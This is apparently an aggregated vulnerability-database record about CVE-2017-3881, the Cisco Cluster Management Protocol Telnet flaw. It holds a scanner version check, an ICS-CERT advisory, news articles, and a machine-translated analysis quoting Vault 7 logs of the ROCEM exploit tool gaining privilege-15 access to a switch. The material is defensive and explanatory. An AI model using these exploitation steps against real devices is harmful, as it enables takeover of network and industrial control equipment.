'12.2(18)S',\n '12.2(18)SE',\n '12.2(18)SE1',\n '12.2(20)EU',\n '12.2(20)EU1',\n '12.2(20)EU2',\n '12.2(20)EWA',\n '12.2(20)EWA1',\n '12.2(20)EWA2',\n '12.2(20)EWA3',\n '12.2(20)EWA4',\n '12.2(20)EX',\n '12.2(20)SE',\n '12.2(20)SE1',\n '12.2(20)SE2',\n '12.2(20)SE3',\n '12.2(20)SE4',\n '12.2(25)EW',\n '12.2(25)EWA',\n '12.2(25)EWA1',\n '12.2(25)EWA10',\n '12.2(25)EWA11',\n '12.2(25)EWA12',\n '12.2(25)EWA13',\n '12.2(25)EWA14',\n '12.2(25)EWA2',\n '12.2(25)EWA3',\n '12.2(25)EWA4',\n '12.2(25)EWA5',\n '12.2(25)EWA6',\n '12.2(25)EWA7',\n '12.2(25)EWA8',\n '12.2(25)EWA9',\n '12.2(25)EY',\n '12.2(25)EY1',\n '12.2(25)EY2',\n '12.2(25)EY3',\n '12.2(25)EY4',\n '12.2(25)EZ',\n '12.2(25)EZ1',\n '12.2(25)FX',\n '12.2(25)FY',\n '12.2(25)FZ',\n '12.2(25)S',\n '12.2(25)S1',\n '12.2(25)SE',\n '12.2(25)SE1',\n '12.2(25)SE2',\n '12.2(25)SE3',\n '12.2(25)SEA',\n '12.2(25)SEB',\n '12.2(25)SEB1',\n '12.2(25)SEB2',\n '12.2(25)SEB3',\n '12.2(25)SEB4',\n '12.2(25)SEC',\n '12.2(25)SEC1',\n '12.2(25)SEC2',\n '12.2(25)SED',\n '12.2(25)SED1',\n '12.2(25)SEE',\n '12.2(25)SEE1',\n '12.2(25)SEE2',\n '12.2(25)SEE3',\n '12.2(25)SEE4',\n '12.2(25)SEF1',\n '12.2(25)SEF2',\n '12.2(25)SEF3',\n '12.2(25)SEG',\n '12.2(25)SEG1',\n '12.2(25)SEG3',\n '12.2(25)SG',\n '12.2(25)SG1',\n '12.2(25)SG2',\n '12.2(25)SG3',\n '12.2(25)SG4',\n '12.2(31)SG',\n '12.2(31)SG1',\n '12.2(31)SG2',\n '12.2(31)SG3',\n '12.2(31)SGA',\n '12.2(31)SGA1',\n '12.2(31)SGA10',\n '12.2(31)SGA11',\n '12.2(31)SGA2',\n '12.2(31)SGA3',\n '12.2(31)SGA4',\n '12.2(31)SGA5',\n '12.2(31)SGA6',\n '12.2(31)SGA7',\n '12.2(31)SGA8',\n '12.2(31)SGA9',\n '12.2(35)SE',\n '12.2(35)SE1',\n '12.2(35)SE2',\n '12.2(35)SE3',\n '12.2(35)SE5',\n '12.2(37)EY',\n '12.2(37)SE',\n '12.2(37)SE1',\n '12.2(37)SG',\n '12.2(37)SG1',\n '12.2(40)EX',\n '12.2(40)EX1',\n '12.2(40)EX2',\n '12.2(40)EX3',\n '12.2(40)SE',\n '12.2(40)SE1',\n '12.2(40)SE2',\n '12.2(40)SG',\n '12.2(40)XO',\n '12.2(44)EX',\n '12.2(44)EX1',\n '12.2(44)SE',\n '12.2(44)SE1',\n '12.2(44)SE2',\n '12.2(44)SE3',\n '12.2(44)SE4',\n '12.2(44)SE5',\n '12.2(44)SE6',\n '12.2(44)SG',\n '12.2(44)SG1',\n '12.2(44)SQ',\n '12.2(44)SQ2',\n '12.2(46)EX',\n '12.2(46)EY',\n '12.2(46)SE',\n '12.2(46)SE1',\n '12.2(46)SE2',\n '12.2(46)SG',\n '12.2(46)SG1',\n '12.2(50)SE',\n '12.2(50)SE1',\n '12.2(50)SE2',\n '12.2(50)SE3',\n '12.2(50)SE4',\n '12.2(50)SE5',\n '12.2(50)SG',\n '12.2(50)SG1',\n '12.2(50)SG2',\n '12.2(50)SG3',\n '12.2(50)SG4',\n '12.2(50)SG5',\n '12.2(50)SG6',\n '12.2(50)SG7',\n '12.2(50)SG8',\n '12.2(50)SQ',\n '12.2(50)SQ1',\n '12.2(50)SQ2',\n '12.2(50)SQ3',\n '12.2(50)SQ4',\n '12.2(50)SQ5',\n '12.2(50)SQ6',\n '12.2(50)SQ7',\n '12.2(52)EX',\n '12.2(52)EX1',\n '12.2(52)SE',\n '12.2(52)SE1',\n '12.2(52)SG',\n '12.2(52)XO',\n '12.2(53)EY',\n '12.2(53)EZ',\n '12.2(53)SE',\n '12.2(53)SE1',\n '12.2(53)SE2',\n '12.2(53)SG',\n '12.2(53)SG1',\n '12.2(53)SG10',\n '12.2(53)SG11',\n '12.2(53)SG2',\n '12.2(53)SG3',\n '12.2(53)SG4',\n '12.2(53)SG5',\n '12.2(53)SG6',\n '12.2(53)SG7',\n '12.2(53)SG8',\n '12.2(53)SG9',\n '12.2(54)SE',\n '12.2(54)SG',\n '12.2(54)SG1',\n '12.2(54)WO',\n '12.2(54)XO',\n '12.2(55)EX',\n '12.2(55)EX1',\n '12.2(55)EX2',\n '12.2(55)EX3',\n '12.2(55)EY',\n '12.2(55)EZ',\n '12.2(55)SE',\n '12.2(55)SE1',\n '12.2(55)SE10',\n '12.2(55)SE11',\n '12.2(55)SE2',\n '12.2(55)SE3',\n '12.2(55)SE4',\n '12.2(55)SE5',\n '12.2(55)SE6',\n '12.2(55)SE7',\n '12.2(55)SE8',\n '12.2(55)SE9',\n '12.2(58)EX',\n '12.2(58)EZ',\n '12.2(58)SE',\n '12.2(58)SE1',\n '12.2(58)SE2',\n '12.2(60)EZ4',\n '12.2(60)EZ5',\n '15.0(1)EY',\n '15.0(1)EY1',\n '15.0(1)EY2',\n '15.0(1)SE',\n '15.0(1)SE1',\n '15.0(1)SE2',\n '15.0(1)SE3',\n '15.0(1)XO',\n '15.0(1)XO1',\n '15.0(2)EB',\n '15.0(2)EC',\n '15.0(2)ED',\n '15.0(2)EJ',\n '15.0(2)EJ1',\n '15.0(2)EX',\n '15.0(2)EX1',\n '15.0(2)EX10',\n '15.0(2)EX2',\n '15.0(2)EX3',\n '15.0(2)EX4',\n '15.0(2)EX5',\n '15.0(2)EX8',\n '15.0(2)EY',\n '15.0(2)EY1',\n '15.0(2)EY2',\n '15.0(2)EY3',\n '15.0(2)EZ',\n '15.0(2)SE',\n '15.0(2)SE1',\n '15.0(2)SE10',\n '15.0(2)SE10a',\n '15.0(2)SE11',\n '15.0(2)SE2',\n '15.0(2)SE3',\n '15.0(2)SE4',\n '15.0(2)SE5',\n '15.0(2)SE6',\n '15.0(2)SE7',\n '15.0(2)SE8',\n '15.0(2)SE9',\n '15.0(2)SG',\n '15.0(2)SG1',\n '15.0(2)SG10',\n '15.0(2)SG11',\n '15.0(2)SG2',\n '15.0(2)SG3',\n '15.0(2)SG4',\n '15.0(2)SG5',\n '15.0(2)SG6',\n '15.0(2)SG7',\n '15.0(2)SG8',\n '15.0(2)SG9',\n '15.0(2)SQD',\n '15.0(2)SQD1',\n '15.0(2)SQD2',\n '15.0(2)SQD3',\n '15.0(2)SQD4',\n '15.0(2)SQD5',\n '15.0(2)XO',\n '15.0(2a)EX5',\n '15.0(2a)SE9',\n '15.1(1)SG',\n '15.1(1)SG1',\n '15.1(1)SG2',\n '15.1(2)SG',\n '15.1(2)SG1',\n '15.1(2)SG2',\n '15.1(2)SG3',\n '15.1(2)SG4',\n '15.1(2)SG5',\n '15.1(2)SG6',\n '15.1(2)SG7',\n '15.1(2)SG7a',\n '15.1(2)SG8',\n '15.1(2)SG9',\n '15.2(1)E',\n '15.2(1)E1',\n '15.2(1)E2',\n '15.2(1)E3',\n '15.2(1)EY',\n '15.2(2)E',\n '15.2(2)E1',\n '15.2(2)E2',\n '15.2(2)E3',\n '15.2(2)E4',\n '15.2(2)E5',\n '15.2(2)E5a',\n '15.2(2)E5b',\n '15.2(2)E6',\n '15.2(2)EB',\n '15.2(2)EB1',\n '15.2(2)EB2',\n '15.2(2a)E1',\n '15.2(2a)E2',\n '15.2(3)E',\n '15.2(3)E1',\n '15.2(3)E2',\n '15.2(3)E3',\n '15.2(3)E4',\n '15.2(3)E5',\n '15.2(3)EX',\n '15.2(3a)E',\n '15.2(3a)E1',\n '15.2(3m)E2',\n '15.2(3m)E3',\n '15.2(3m)E6',\n '15.2(3m)E8',\n '15.2(4)E',\n '15.2(4)E1',\n '15.2(4)E2',\n '15.2(4)E3',\n '15.2(4)EC',\n '15.2(4)EC1',\n '15.2(4)EC2',\n '15.2(4m)E1',\n '15.2(4m)E3',\n '15.2(4n)E2',\n '15.2(4o)E2',\n '15.2(4p)E1',\n '15.2(5)E',\n '15.2(5)E1',\n '15.2(5)EX',\n '15.2(5a)E',\n '15.2(5a)E1',\n '15.2(5b)E',\n '15.2(5c)E' );\n\nforeach af ( affected )\n{\n if( version == af )\n {\n report = report_fixed_ver( installed_version:version, fixed_version: \"See advisory\" );\n security_message( port:0, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-07-28T08:11:10", "description": "### **CVSS v3 9.8**\n\n**ATTENTION: **Remotely exploitable/low skill level to exploit.\n\n**Vendor:** Rockwell Automation\n\n**Equipment:** Allen-Bradley Stratix, Allen-Bradley ArmorStratix\n\n**Vulnerability:** Improper Input Validation\n\n## AFFECTED PRODUCTS\n\nThe following versions of the Allen-Bradley Stratix and ArmorStratix Industrial Ethernet and Distribution switches are affected:\n\n * Allen-Bradley Stratix 5400 Industrial Ethernet Switches, All Versions 15.2(5)EA.fc4 and earlier,\n * Allen-Bradley Stratix 5410 Industrial Distribution Switches, All Versions 15.2(5)EA.fc4 and earlier,\n * Allen-Bradley Stratix 5700 and ArmorStratix 5700 Industrial Managed Ethernet Switches, All Versions 15.2(5)EA.fc4 and earlier,\n * Allen-Bradley Stratix 8000 Modular Managed Industrial Ethernet Switches, All Versions 15.2(5)EA.fc4 and earlier, and\n * Allen-Bradley Stratix 8300 Modular Managed Industrial Ethernet Switches, All Versions 15.2(4a)EA5 and earlier.\n\n## IMPACT\n\nSuccessful exploitation of this vulnerability may allow a remote attacker to impact the availability of the target device or to execute arbitrary code with elevated privileges.\n\n## MITIGATION\n\nRockwell Automation has provided interim compensating controls for Allen-Bradley Stratix and ArmorStratix switches to help reduce the risk of exploitation of the vulnerability identified in the Cisco Cluster Management Protocol (CMP) processing code used in the Cisco IOS and Cisco IOS XE software. Allen-Bradley Stratix and ArmorStratix products contain the affected versions of the Cisco IOS and IOS XE software.\n\nRockwell Automation encourages users to evaluate the compensating controls provided below and apply the applicable controls.\n\n * Disable the Telnet protocol as an allowed protocol for incoming connections on affected devices to diminish the network-based vector of attack. For information on how to disable Telnet via Command Line Interface, please see Knowledgebase Article ID 1040270, which is available at the following location (with a valid account):\n\n<https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1040270>\n\n * If a user is unable or unwilling to disable Telnet, then implementing infrastructure access control lists (iACLs) can reduce the attack service. For information on how to implement iACLs, please see Knowledgebase Article ID 1040270.\n * Cisco has created two Snort rules (SIDs), 41909 and 41910, to detect exploits associated with this vulnerability.\n\nRockwell Automation security advisory, Stratix CMP Remote Code Execution Vulnerability, is available at the following location (with a valid account):\n\n<https://rockwellautomation.custhelp.com/app/answers/detail/a_id/54102>\n\nCisco\u2019s security advisory, Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability, is available at the following location:\n\n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>\n\nNCCIC/ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n## VULNERABILITY OVERVIEW\n\n## [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nAn unauthorized remote attacker may be able to establish a Telnet session with a target device by sending malformed CMP-specific Telnet messages. Incorrect processing of these messages may cause the device to reload or to allow the attacker to execute arbitrary code with elevated privileges.\n\n[CVE-2017-3881](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-3881>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n## RESEARCHER\n\nRockwell Automation has reported this vulnerability.\n\n## BACKGROUND\n\n**Critical Infrastructure Sector(s):** Critical Manufacturing, Energy, Water and Wastewater Systems\n\n**Countries/Areas Deployed:** Worldwide\n\n**Company Headquarters Location:** Milwaukee, Wisconsin\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-04T12:00:00", "type": "ics", "title": "Rockwell Automation Allen-Bradley Stratix and Allen-Bradley ArmorStratix", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2017-04-04T12:00:00", "id": "ICSA-17-094-03", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-17-094-03", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-04-18T03:22:45", "description": "! [](/Article/UploadPic/2017-4/201741811149488.jpg)\n\n2017 3 December 17, Cisco official website announced that the Cisco IOS&IOS-XE Software Cluster Management Protocol(Cluster Management Protocol)the presence of a remote code execution vulnerability, CVE-2017-3881-in.\n\nThe vulnerability is Cisco in the study of the CIA leak of the document\u201cVault 7\u201din the process of discovery, an attacker can unauthorized remote restart of the affected device or unauthorized code execution. Caused by the vulnerability of the main reasons is because there is no limit CMP-specific Telnet can be used only inside the local cluster of communication between members, but can be used to connect any of the affected equipment, as well as for the deformation of the CMP-specific Telnet option to set the error handling. When using a Telnet connection to an affected device, an attacker can send a variation of CMP-specific Telnet options set to build with the device connected, using this method an attacker can remotely execute arbitrary code to completely control the device or makes the device reboot.\n\nAs of this writing, Cisco is also no fix for Cluster Management Protocol remote code execution vulnerability CVE-2017-3881\u3002\n\nVault 7 document discloses a remote code execution vulnerability testing process, the vulnerability does not use the source code but in the interactive mode or the Setup mode to start. Interactive mode via telnet to send the payload, and in the same telnet connection context immediately to the attacker with a command shell:\n\n\nStarted ROCEM interactive session - successful:\nroot@debian:/home/user1/ops/adverse/adverse-1r/rocem# ./ rocem_c3560-ipbase-mz.122-35.SE5.py -i 192.168.0.254\n[+] Validating data/interactive. bin\n[+] Validating data/set. bin\n[+] Validating data/transfer. bin\n[+] Validating data/unset. bin\n****************************************\nImage: c3560-ipbase-mz. 122-35. SE5\nHost: 192.168.0.254\nAction: Interactive\n****************************************\nProceed? (y/n)y\nTrying 127.0.0.1...\n[*] Attempting connection to host 192.168.0.254:23\nConnected to 127.0.0.1.\nEscape character is '^]'.\n[+] Connection established\n[*] Starting the interactive session\nUser Access Verification\nPassword:\nMLS-Sth#\nMLS-Sth# show priv\nThe Current privilege level is 15\nMLS-Sth#show users\nLine User Host(s) Idle Location\n* 1 vty 0 idle 00:00:00 192.168.221.40\nInterface User Mode Idle Peer Address\nMLS-Sth#exit\nConnection closed by foreign host.\n\nUSE setting mode, modify the switch memory for subsequent telnet unauthorized connection to do to prepare:\n\n\nTest set/unset feature of ROCEM\nThe DUT is configured with the target configuration and network setup\nThe DUT is accessed by hopping through three flux nodes as per the CONOP\nReloaded the DUT to start with a clean device\nFrom Adverse ICON machine, set ROCEM:\nroot@debian:/home/user1/ops/adverse/adverse-1r/rocem# ./ rocem_c3560-ipbase-mz.122-35.SE5.py -s 192.168.0.254\n[+] Validating data/interactive. bin\n[+] Validating data/set. bin\n[+] Validating data/transfer. bin\n[+] Validating data/unset. bin\n****************************************\nImage: c3560-ipbase-mz. 122-35. SE5\nHost: 192.168.0.254\nAction: Set\n****************************************\nProceed? (y/n)y\n[*] Attempting connection to host 192.168.0.254:23\n[+] Connection established\n[*] Sending Protocol Step 1\n[*] Sending Protocol Step 2\n[+] Done\nroot@debian:/home/user1/ops/adverse/adverse-1r/rocem#\nVerified I could telnet and rx priv 15 without creds:\nroot@debian:/home/user1/ops/adverse/adverse-1r/rocem# telnet 192.168.0.254\nTrying 192.168.0.254...\nConnected to 192.168.0.254.\nEscape character is '^]'.\nMLS-Sth#\nMLS-Sth#show priv\nThe Current privilege level is 15\nMLS-Sth#\n\nIn the study of this vulnerability, we found one on our useful information--telnet debug output:\n\n\n14. Confirm Xetron EAR 5355 - Debug telnet causes anomalous output \n1. Enabled the debug telnet on DUT\n2. Set ROCEM\n3. Observed the following:\n000467: Jun 3 13:54:09.330: TCP2: Telnet received WILL TTY-SPEED (32) (refused)\n000468: Jun 3 13:54:09.330: TCP2: Telnet sent DONT TTY-SPEED (32)\n000469: Jun 3 13:54:09.330: TCP2: Telnet received WILL LOCAL-FLOW (33) (refused)\n000470: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LOCAL-FLOW (33)\n000471: Jun 3 13:54:09.330: TCP2: Telnet received WILL LINEMODE (34)\n000472: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LINEMODE (34) (unimplemented)\n000473: Jun 3 13:54:09.330: TCP2: Telnet received WILL NEW-ENVIRON (39)\n000474: Jun 3 13:54:09.330: TCP2: Telnet sent DONT NEW-ENVIRON (39) (unimplemented)\n000475: Jun 3 13:54:09.330: TCP2: Telnet received DO STATUS (5)\n000476: Jun 3 13:54:09.330: TCP2: Telnet sent WONT STATUS (5) (unimplemented)\n000477: Jun 3 13:54:09.330: TCP2: Telnet received WILL X-DISPLAY (35) (refused)\n000478: Jun 3 13:54:09.330: TCP2: Telnet sent DONT X-DISPLAY (35)\n000479: Jun 3 13:54:09.330: TCP2: Telnet received DO ECHO (1)\n000480: Jun 3 13:54:09.330: Telnet2: recv SB NAWS 116 29\n000481: Jun 3 13:54:09.623: Telnet2: recv SB 36 92 OS^K'zAuk,Fz90X\n000482: Jun 3 13:54:09.623: Telnet2: recv SB 36 0 ^CCISCO_KITS^Ap\n\nNote that the last line received CISCO_KITS of the option, the time to prove that this is an important string.\n\nAccording to Cisco's current published case, a total of 318 products affected by this vulnerability, a detailed list of products please see Appendix,\n\nCurrently the following only two products are not affected by this vulnerability:\n\n1. Running Cisco IOS Software, but not in the affected list of devices is not affected.\n\n2. Running Cisco IOS XE Software but does not include a CMP Protocol subsystem of the product is not affected.\n\nCVE-2017-3881 the detection method\n\n**[1] [[2]](<85361_2.htm>) [[3]](<85361_3.htm>) [[4]](<85361_4.htm>) [[5]](<85361_5.htm>) [next](<85361_2.htm>)**", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-04-18T00:00:00", "type": "myhack58", "title": "Cisco Catalyst 2960 switch in CVE-2017-3881 vulnerability analysis-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2017-04-18T00:00:00", "id": "MYHACK58:62201785361", "href": "http://www.myhack58.com/Article/html/3/62/2017/85361.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T00:00:00", "type": "cisa_kev", "title": "Cisco IOS and IOS XE Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2022-03-25T00:00:00", "id": "CISA-KEV-CVE-2017-3881", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:39", "description": "[![cisco-switches-patch-update](https://2.bp.blogspot.com/-KIXE9BbUCXE/WRMHDL-IzYI/AAAAAAAAsjA/T4B956p7tjwhvoHd79DRUZckANQcxx9XwCLcB/s1600/cisco-switches-patch-update.png)](<https://2.bp.blogspot.com/-KIXE9BbUCXE/WRMHDL-IzYI/AAAAAAAAsjA/T4B956p7tjwhvoHd79DRUZckANQcxx9XwCLcB/s1600/cisco-switches-patch-update.png>)\n\nCisco Systems has finally [released](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>) an update for its IOS and IOS XE software to address a critical vulnerability, disclosed nearly two months back in the [CIA Vault 7 leak](<https://thehackernews.com/2017/03/cisco-network-switch-exploit.html>), that affects more than 300 of its switch models. \n \nThe company identified the vulnerability in its product while analyzing \"Vault 7\" dump \u2014 thousands of documents and files leaked by Wikileaks, claiming to detail hacking tools and tactics of the U.S. Central Intelligence Agency (CIA). \n \nAs [previously reported](<https://thehackernews.com/2017/03/cisco-network-switch-exploit.html>), the vulnerability (CVE-2017-3881) resides in the Cluster Management Protocol (CMP) \u2014 which uses Telnet or SSH to deliver signals and commands on internal networks \u2014 in Cisco IOS and Cisco IOS XE Software. \n \nThe vulnerability can be exploited remotely by sending \"malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections,\" researchers say. \n \nThe company warned users on April 10 that an exploit targeting the flaw had been made public (here's a [proof-of-concept (PoC) exploit](<https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/>)) and provided some mitigation advice, but patched the issue this week only. \n \nOnce exploited, an unauthenticated, remote attacker can remotely execute malicious code on a device with elevated privileges to take full control of the device or cause a reboot of the affected device. \n \nThe vulnerability is in the default configuration of the affected Cisco devices and affects 264 Catalyst switches, 51 industrial Ethernet switches, and 3 other devices if they are running IOS and are configured to accept Telnet connections. \n \nThe affected Cisco switch models include Catalyst switches, Embedded Service 2020 switches, IE Industrial Ethernet switches, ME 4924-10GE switch, Enhanced Layer 2/3 EtherSwitch Service Module, Enhanced Layer 2 EtherSwitch Service Module, RF Gateway 10, SM-X Layer 2/3 EtherSwitch Service Module, and Gigabit Ethernet Switch Module for HP (check the [list of affected models](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>) here). \n \nThe vulnerability was given a score of 9.8 (higher level of risk) based on the Common Vulnerability Scoring System, which means the issue is truly bad. \n \nThe only mitigation available for users was to disable the Telnet connection to the switch devices in favor of SSH, but now since the company has patched the issue, administrators are strongly advised to install the patch as soon as possible.\n", "cvss3": {}, "published": "2017-05-10T01:27:00", "type": "thn", "title": "Cisco Finally Patches 0-Day Exploit Disclosed In Wikileaks-CIA Leak", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-05-10T12:27:27", "id": "THN:BCA8EAC492CA7110C715BA2B88A40246", "href": "https://thehackernews.com/2017/05/cisco-network-switch-update.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:15", "description": "[![cisco-network-switch-telnet-exploit-wikileaks-cia-hacking](https://2.bp.blogspot.com/-lSlZv3J44jE/WM-QAmPBkcI/AAAAAAAAr2E/m1cKN0mm_OQcS4OT4J8GWJwLD4Vtiq0egCLcB/s1600/cisco-network-switch-telnet-exploit-wikileaks-cia-hacking.png)](<https://2.bp.blogspot.com/-lSlZv3J44jE/WM-QAmPBkcI/AAAAAAAAr2E/m1cKN0mm_OQcS4OT4J8GWJwLD4Vtiq0egCLcB/s1600/cisco-network-switch-telnet-exploit-wikileaks-cia-hacking.png>)\n\nCisco is warning of a new critical zero-day IOS / IOS XE vulnerability that affects more than 300 of its switch models. \n \nThe company identified this highest level of vulnerability in its product while analyzing \"[Vault 7](<https://thehackernews.com/2017/03/wikileaks-cia-hacking-tool.html>)\" \u2014 a roughly 8,761 documents and [files leaked by Wikileaks](<https://thehackernews.com/2017/03/wikileaks-cia-hacking-exploits.html>) last week, claiming to [detail hacking tools](<https://thehackernews.com/2017/03/wikileaks-cia-vault7-leak.html>) and tactics of the Central Intelligence Agency (CIA). \n \nThe vulnerability resides in the Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software. \n \nIf exploited, the flaw ([CVE-2017-3881](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3881>)) could allow an unauthenticated, remote attacker to cause a reboot of an affected device or remotely execute malicious code on the device with elevated privileges to take full control of the device, Cisco says in its [advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>). \n \nThe CMP protocol has been designed to pass around information about switch clusters between cluster members using Telnet or SSH. \n \nThe vulnerability is in the default configuration of affected Cisco devices, even if the user doesn't configure any cluster configuration commands. The flaw can be exploited during Telnet session negotiation over either IPv4 or IPv6. \n \nAccording to the Cisco researchers, this bug occurs in Telnet connections within the CMP, due to two factors: \n \n\n\n * The protocol doesn't restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members; instead, it accepts and processes commands over any Telnet connection to an affected device.\n * The incorrect processing of malformed CMP-specific Telnet options.\n \nSo, in order to exploit this vulnerability, an attacker can send _\"malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections,\" _researchers say. \n \nThis exploitation could allow the attacker to remotely execute malicious code and obtain full control of the affected device or cause a reload of the affected device. \n \n\n\n### Disable Telnet On Vulnerable Models \u2014 Patch is not Available Yet!\n\n \nThe vulnerability affects 264 Catalyst switches, 51 industrial Ethernet switches, and 3 other devices, which includes Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2/3 EtherSwitch Service Module, Enhanced Layer 2 EtherSwitch Service Module, ME 4924-10GE switch, IE Industrial Ethernet switches, RF Gateway 10, SM-X Layer 2/3 EtherSwitch Service Module, and Gigabit Ethernet Switch Module (CGESM) for HP. (check [complete list](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>) here) \n \nCurrently, this vulnerability is unpatched, and until patches are available, Cisco recommends its users to disable the Telnet connection to the switch devices in favor of SSH. \n \nThe company's advisory doesn't talk about any working exploit using this flaw, but if there's one, tens of thousands, if not hundreds of thousands, of devices installed around the world look to have been at great risk for an unknown 